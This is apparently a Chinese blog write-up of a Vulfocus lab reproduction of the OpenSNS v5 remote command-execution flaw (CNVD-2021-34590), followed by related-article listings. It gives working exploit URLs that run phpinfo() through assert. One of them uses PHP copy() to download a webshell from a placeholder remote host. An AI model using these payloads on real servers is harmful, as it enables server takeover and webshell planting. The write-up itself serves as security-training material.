vulfocus——opensns命令执行(CNVD-2021-34590)

最新推荐文章于 2024-01-22 12:01:33 发布
原创 最新推荐文章于 2024-01-22 12:01:33 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#servlet #jar #java

本文详细介绍了OpenSNS系统中存在的命令执行漏洞,攻击者可通过发送特定请求执行任意命令,从而获取服务器控制权限。复现过程包括:1. 打开靶场;2. 发送请求包;3. 查找phpinfo中的flag;4. 使用copy函数下载webshell。此漏洞利用了系统函数的弱点,实现了远程代码执行。

描述

OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。 

复现

1.打开靶场

2.发送特定请求包可以执行任意命令

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo() 

3.在phpinfo找到flag

4.也可以通过下载webshell,用工具连接

此处的cmd= 只能传参1个,在使用'system'函数空格会导致执行失败,故而使用php中的copy函数直接下载webshell实现RCE。

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=copy(%27http://xxx/a.txt%27,%27a.php%27)

 copy(远程文件下载地址,需要下载到的地方) 

漏洞复现 || OpenSNS远程命令执行漏洞
失心少年
07-12 1038
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。1.执行如下POC可执行远程命令。
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 3080
VULFOCUS CVE-2020-5504
opensns 命令执行CNVD-2021-34590)漏洞复现
weixin_42675091的博客
09-23 1806
opensns 命令执行CNVD-2021-34590)漏洞复现
Opensns 命令执行漏洞(CNVD-2021-34590)
小小猪的博客
12-29 4362
Opensns 命令执行漏洞(CNVD-2021-34590) 漏洞描述: OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 影响版本: OpenSNS v5 环境搭建: 在线环境 地址 访问首页 构造poc /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[m.
vulfocus复现:Log4j2远程命令执行(CVE-2021-44228)
m0_71518346的博客
12-17 1050
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
OpenSNS命令执行(CNVD-2021-34590)
m0_65150886的博客
01-22 815
OpenSNS是想天科技开发的一款综合性社交软件。用户可以使用OpenSNS快速搭建一个类似于新浪微博一样的功能强大的社交网站。用户的社交网站也可以在微信中被访问,还支持苹果和安卓手机通过APP的形式使用。除此之外,OpenSNS还提供云市场进行功能扩展。OpenSNS v5存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。1.访问http://ip:port,出现如下页面,开始实验。2.构造payload,访问phpinfo。
OpenSNS 远程执行任意命令漏洞
未花的博客
12-01 774
status必须等于1,值里必须要app、model、method
OpenSNS开源社交系统 v5.7.0
10-14
OpenSNS一款有身份的开源SNS社交系统,包含 微博、资讯、活动、论坛、专辑、积分商城、群组、充值中心、 问答、分类信息、微店等模块,支持PC端、手机网页版、客户端、 微信版
CNVD-2024-36533漏洞复现
最新发布
09-04
但基于历史类似漏洞(如CNVD-2021-30167或CNVD-2020-22721),您可以推断模式: - 检查漏洞类型:命令执行、SQL注入等(CNVD条目通常描述此信息)[^2]。 - 搜索公开PoC:在安全社区如Exploit-DB或GitHub查询CNVD编号...
OpenSNS开源社交系统--文件上传渗透测试复现
CNXBDSa的博客
08-19 2140
前提:在先知社区里面偶然看见了这个漏洞,咱也想试试,就下载了开源的码进行了本地的复现 源码信息:OpenSNS开源版 漏洞类型:后台getshell 下载地址:http://www.opensns.cn/home/index/download.html 漏洞文件:./Application/Admin/Controller/ThemeController.class.php 第170行 可参考这下载安装使用https://www.w3cschool.cn/opensnscourse/laxp1pnw.htm
基于PHP的OpenSNS-V5社交平台开源设计源码
09-29
OpenSNS-V5为社交创业项目提供了坚实的平台基础,其开源性质降低了开发成本,让开发者可以更加专注于功能的创新和用户体验的优化。它不仅可以用于构建传统的社交媒体网站,还可以用于社区论坛、企业内部社交网络,...
Vulfocus之tomcat系列题目获取flag攻略
weixin_45130489的博客
09-19 2650
快速通关靶场,3个tomcat漏洞的题目。
vulfocus复现:nginx-php-flag
m0_71518346的博客
12-18 400
命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。
OpenSIPS脚本中的flag
至虛極,守靜篤
01-25 823
OpenSIPS脚本中的flag分类,使用。
[Vulfocus解题系列] struts2-046 远程代码执行 (CVE-2017-5638)
00勇士王子的博客
07-12 1581
漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代
未授权漏洞vulfocu靶场实战
beichenyyds的博客
03-03 7498
rsync未授权漏洞 打开会有一个输入flag的文本框,所以我们需要查找flag如图 把网站的ip信息收集到如图 在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入 rsync rsync://123.58.236.76 :19358/src/ 上面也说了flag在tmp目录下所以输入 rsync rsync://123.58.236.76:19358/src/tmp/ 可以查到flag 如图 复制到靶场flag位置 可以看到
vulfocus-struts2 命令执行 (CVE-2016-3081)
Fanny0602的博客
06-16 2147
vulfocus靶场:struts2 命令执行 (CVE-2016-3081)。
vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 3004
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
[漏洞复现]vulfocus/jenkins-cve_2017_1000353
qq_45751902的博客
11-24 775
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限建议自己搭建环境复现,这个vulfocus上没有体现出反序列化漏洞,因为无法使用反序列化查看flag,最终使用弱口令登录,执行系统命令成功找到flag。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值